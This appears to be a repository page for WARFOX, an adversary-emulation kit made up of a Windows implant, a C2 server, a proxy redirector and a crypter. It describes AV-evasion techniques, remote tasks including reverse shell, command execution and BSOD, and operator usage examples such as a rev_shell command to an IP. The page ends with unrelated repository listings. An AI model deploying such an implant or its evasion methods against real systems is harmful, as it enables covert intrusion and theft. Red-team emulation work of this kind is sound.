WARFOX is a software-based HTTPS beaconing Windows implant that uses a multi-layered proxy network for C2 communications.

Overview

version description description

image

WARFOX is a software-based HTTPS beaconing Windows implant that uses a multi-layered proxy network for C2 communications. This kit was designed to emulate covert APT offensive operations. This kit includes WARFOX (Windows implant), HIGHTOWER (C2 server), and other tools to build configs and set up multi-layered proxy networks.

Inspiration for this kit is taken from implants developed by EMISSARY PANDA (APT 27), and WICKED PANDA (APT 41). Various techniques and TTPs were inspired by public reports on APT malware.

Included Tools and Scripts

  • WARFOX: A software implant written in C++ designed to target Windows systems to aid in the post-exploitation phase of an offensive operation. This implant provides the operator with 13 features in the form of tasks (commands). This implant is designed to evade both host-based and network-based detection.
  • HIGHTOWER: An Python HTTP server that manages and provides tasks to hosts implanted with WARFOX, network communications are encrypted using a self-signed TLS certificate.
  • LIGHTBEAM: A TCP traffic redirector that can be used to mask traffic between WARFOX and HIGHTOWER. This redirector can be daisy-chained to form a multi-level proxy network for WARFOX
  • FILEGUARD: A file compressor and crypter, FILEGUARD uses ZLIB and AES-128 (CBC) to obfuscate and pack files
  • edit_timestamp.py: Edit the PE timestamp to include a random date going back in time 90 days
  • build_config.py: Generate AES encrypted configuration data for your IP:PORT pair

Network Architecture and Design

LIGHTBEAM TCP traffic redirectors can be daisy-chained together to form a multi-layered proxy node network to mask traffic between a host running WARFOX and HIGHTOWER. LIGHTBEAM relies on socat for traffic redirection, the tool can be run on Linux hosts.

  • Traffic between WARFOX hosts and HIGHTOWER is encrypted using self-signed certificates
  • WARFOX hosts periodically beacon over HTTPS to HIGHTOWERs HTTP server
  • When an operator issues a new task for a WARFOX host, the task command is included in the HTTP response packet, this is processed by WARFOX's tasking/processing engine

image

HIGHTOWER relies on two designated HTTPS endpoints to process beaconing check-ins and task command results

  • Endpoint #1 (/update) receives inbound beacon requests from WARFOX hosts, host sessions are determined by the id field of the beaconing packet.
  • Endpoint #2 (/finish) receives the results of issued task commands, this information is displayed to the operator that issued the task

Secure Communications

To avoid network detection, WARFOX beaconing and tasking responses were designed to evade common network detection techniques.

  • Beaconing intervals are randomized using jitter to avoid easy-to-spot patterns. This is implemented using a sleep function call with a random value between network requests
  • Network traffic is encrypted using TLS to avoid the ability to write Snort or Suricata rules for traffic patterns. Additionally, the self-generated certificates use null values to avoid being easily detected or blacklisted based on their information

WARFOX

  • Beaconing Engine:

    • The beaconing engine is responsible for preparing periodic beaconing check-in requests with HIGHTOWER. The implant periodically checks-in with HIGHTOWER via beacon requests that include information related to the infected system. Outbound beacon requests include the systems hostname, current users’ username, system architecture, and more. The information for beacon requests is packaged into a JSON object, encoded via BASE64, and sent to the /update HIGHTOWER endpoint.
  • Tasking Engine:

    • When an operator issues a new task for the implant, the command is set as the default HTTP response, when the implant identifies that a new task was issued, it's parsed via the Tasking Engine to determine what functionality to execute. When a task is received, the corresponding function (get_processes for example) is executed and the task result is packaged into a task_response JSON object which is exfiltrated to the /finish HIGHTOWER endpoint.
  • Networking Engine:

    • Beacon check-ins and task responses use the Networking Engine to send HTTPS requests to HIGHTOWER via the Windows WinInet API library. Before sending a request, HTTPs is enabled for requests.
  • Protected Configuration:

    • The embedded HIGHTOWER IP address and port are encrypted within the implant configuration. When required, the configuration data is decrypted via AES-128 in CBC mode. New configurations can be created using the build_config.py script located in the /scripts directory.

Supported Tasks

The WARFOX implant supports 12 operator-provided tasks. The following table provides an overview of the task categories. Tasks in the Interaction category require an additional argument to carry out the relevant operation, consult the usage section for examples.

Task Command Description Category
get_processes List the running processes using NtQuerySystemInformation Information Gathering
get_drivers List the running drivers using NtQuerySystemInformation Information Gathering
get_users List information about the users on the system Information Gathering
get_clipboard Get a copy of clipboard contents Information Gathering
find_files Locate files by a specific extension in a directory Interaction
del_file Delete a file Interaction
kill_pid Kill a process by its PID Interaction
rev_shell Spawn an interactive shell Interaction
exec_command Execute a system command Execution
bsod BSOD the system Other
reg_persist Persist via the Registry using the RunOnce key Other
uninstall Uninstall and remove traces of artifacts on the remote system Other

Evasion Mechanisms

  • Sensitive strings are obfuscated using a compile-time based XOR obfuscation libary
  • The embedded IP:PORT configuration is encrypted using AES
  • API function calls are obfuscated using API hashing via the SuperFastHash algorithm
  • (Recommended) The binary is compiled using LLVM-Obfuscator

Dependencies

WARFOX relies on a few third-party libraries which makes WARFOX susceptible of being detected based on known code patterns or signatures. While these libraries made development easier, a future goal is to implement everything from scratch.

Antivirus Detection

Currently, the compiled WARFOX implant is undetected by all AntiVirus products according to VirusTotal

image

HIGHTOWER

Overview

HIGHTOWER is a Python based HTTP server that supports WARFOX infections, HIGHTOWER relies on the http.server Python module. HIGHTOWER is unique in the fact that it mimics a legitimate IIS webserver.

Usage Guide

You can use the !help terminal command to display the help menu which provides an overview of how to configure the server for the first time, and what tasks you can issue to WARFOX.

image

You can use the !settings terminal command to display the current server settings. You are required to set a listening port with !listen before issuing tasks.

image

The !listen server command takes a port to listen on, after executing this command, the SRVPORT setting is populated

After you set a listening port, you can issue new tasks to hosts that beacon to HIGHTOWER using the !issue command. Certain tasks such as rev_shell require additional data, you can find a list of which commands require data in the technical documentation PDF

image

New certificates for enabling SSL/HTTPS can be generated using OpenSSL

openssl req -new -x509 -keyout localhost.pem -out localhost.pem -days 365 -nodes

Interaction Command Examples

  • issue find_files c:\users\maxim\documents\*
  • issue del_file c:\users\maxim\documents\test.docx*
  • !issue kill_pid 5597
  • !issue find_exec_command calc.exe
  • !issue rev_shell 192.168.55.103:4443

LIGHTBEAM

LIGHTBEAM is a Bash based TCP traffic redirector that can be used to mask traffic between WARFOX and HIGHTOWER.

To configure LIGHTBEAM you need to set the following variables:

  1. LOCAL_LISTENING_PORT is the local port that recieves inbound TCP traffic from WARFOX
  2. C2_SERVER_IP is the IP address of the remote server to redirect traffic to
  3. C2_SERVER_PORT is the port that the layer2 remote server is listening on

FILEGUARD

PEGUARD has a dedicated Github repository here. This utility compresses files with ZLIB and encrypts them with AES-128 in CBC mode, the AES key is randomly generated and appended to the packed file.

image

Technical Details

FILEGUARD takes a file as input, compresses it via GZIP, encrypts it using AES-128 (CBC mode) and appends the AES key to the end of the file. This utility was designed to pack the WARFOX DLL implant to aid in its DLL sideloading execution process.

  1. You provide an input file (technically any file type should work) as argv[1] and the expected output file as argv[2]
  2. FileGuard compresses the input file using GZIP and writes a copy to disk
  3. FileGuard encrypts the compressed file using AES-128 in CBC mode with a randomly generated key
    • The AES IV is hardcoded as ffffffffffffffff to make the key parsing process of the dropper utility easier, but it could be randomized
  4. The AES key is appended to the file so it can be discovered by the dropper utility
  5. A copy of the finalized binary is stored in an output text file; the binary is formatted as a BYTE array which can be embedded in the dropper process
Issues
  • Timestomp python script does not work

    Timestomp python script does not work

    Hi,

    I was trying out the edit_timestamp.py script but it does not change the date on an EXE file for me. I checked the date with CFF explorer but it didn't change. Any ideas what may be wrong?

    opened by carlnykvist 1
Owner
Malware Researcher/Adversary Simulation/Reverse Engineer/Exploit Developer
null
A lightweight Universal Windows proxy app based on https://github.com/eycorsican/leaf

Maple A lightweight Universal Windows proxy app based on https://github.com/eycorsican/leaf Features Configuration management Outbound network adapter

YtFlow 635 Aug 6, 2022
QuantumGate is a peer-to-peer (P2P) communications protocol, library and API written in C++.

About QuantumGate is a peer-to-peer (P2P) communications protocol, library and API. The long-term goal for QuantumGate is to become a platform for dis

Karel Donk 83 Jul 9, 2022
Header-only C++14 library for getting network addresses associated with network interface without name lookups on Windows, macOS, Linux, and FreeBSD

NetIF Get addresses associated with network interfaces on a system without using name lookups. Header-only, requires C++14. Usage Add the header file

GMLC-TDC 9 Aug 2, 2022
Netif - Header-only C++14 library for getting network addresses associated with network interface without name lookups on Windows, macOS, Linux, and FreeBSD

NetIF Get addresses associated with network interfaces on a system without using name lookups. Header-only, requires C++14. Usage Add the header file

GMLC-TDC 9 Feb 4, 2022
BingBing 54 Jul 27, 2022
A simple SIP server (proxy) for handling VoIP calls based on SIP using C++

Sip Server A simple sip server for handling VoIP calls based on sip protocol. Features Registration Of Users The server supports registration process.

null 7 May 27, 2022
A modern C++ network library for developing high performance network services in TCP/UDP/HTTP protocols.

evpp Introduction 中文说明 evpp is a modern C++ network library for developing high performance network services using TCP/UDP/HTTP protocols. evpp provid

Qihoo 360 3k Jul 28, 2022
XMap is a fast network scanner designed for performing Internet-wide IPv6 & IPv4 network research scanning.

XMap is reimplemented and improved thoroughly from ZMap and is fully compatible with ZMap, armed with the "5 minutes" probing speed and novel scanning techniques. XMap is capable of scanning the 32-bits address space in under 45 minutes.

idealeer 175 Jul 17, 2022
Event-driven network library for multi-threaded Linux server in C++11

Muduo is a multithreaded C++ network library based on the reactor pattern. http://github.com/chenshuo/muduo Copyright (c) 2010, Shuo Chen. All righ

Shuo Chen 11.7k Aug 2, 2022
an easy implementation of a multi-process tcp server and a multi-thread tcp client

一个TCP多进程服务器-多线程客户端的简单实现。 客户端类似Apache ab的测试功能,能够通过向某一个ip端口发送指定并发量和总数量的tcp短连接;服务端处理tcp短连接,每来一条消息就打印一条log。 使用cmake编译,建议在vscode里编译,或者命令行 # 终端进入目录 mkdir bu

adin 1 Nov 28, 2021
aria2 is a lightweight multi-protocol & multi-source, cross platform download utility operated in command-line.

aria2 is a lightweight multi-protocol & multi-source, cross platform download utility operated in command-line. It supports HTTP/HTTPS, FTP, SFTP, BitTorrent and Metalink.

aria2 27k Aug 3, 2022
Pipy is a tiny, high performance, highly stable, programmable proxy written in C++

Pipy is a tiny, high performance, highly stable, programmable proxy. Written in C++, built on top of Asio asynchronous I/O library, Pipy is extremely lightweight and fast, making it one of the best choices for service mesh sidecars.

null 463 Aug 9, 2022
Phorklift is an HTTP server and proxy daemon, with clear, powerful and dynamic configuration.

Phorklift is an HTTP server and proxy daemon, with clear, powerful and dynamic configuration.

null 43 Mar 1, 2022
zrp is a nat-passthrough reverse proxy written in modern c++.

zrp is a nat-passthrough reverse proxy written in modern c++. A major use case is to expose a local server via a remote server with public IP.

Coleman 11 Nov 23, 2021
Pushpin is a reverse proxy server written in C++ that makes it easy to implement WebSocket, HTTP streaming, and HTTP long-polling services.

Pushpin is a reverse proxy server written in C++ that makes it easy to implement WebSocket, HTTP streaming, and HTTP long-polling services. The project is unique among realtime push solutions in that it is designed to address the needs of API creators. Pushpin is transparent to clients and integrates easily into an API stack.

Fanout 3.1k Aug 4, 2022
A Nginx module which tries to implement proxy wasm ABI in Nginx.

Status This library is under construction. Description A Nginx module which tries to implement proxy wasm ABI in Nginx. Install dependencies Download

API7 77 Jul 23, 2022
A proxy service of incremental log of OceanBase

OceanBase Migration Serivce LogProxy OceanBase增量日志代理服务,是 OMS 的一部分。基于 liboblog, 以服务的形式,提供实时增量链路接入和管理能力,方便应用接入OceanBase增量日志;能够解决网络隔离的情况下,订阅增量日志的需求;并提供多种

OceanBase 20 Aug 1, 2022
reverse proxy with web server and preview page

Reverse Proxy Dependencies Go Make Suport Termux (android/afsd kernel) linux (kernel) Install: Termux: 1 step: Install Go-lang, Git and Make pkg insta

AlbâniaSecurity-RT 7 Feb 19, 2022
A forward proxy module for CONNECT request handling

name This module provides support for the CONNECT method request. This method is mainly used to tunnel SSL requests through proxy servers. Table of Co

Xiaochen Wang 1.2k Aug 8, 2022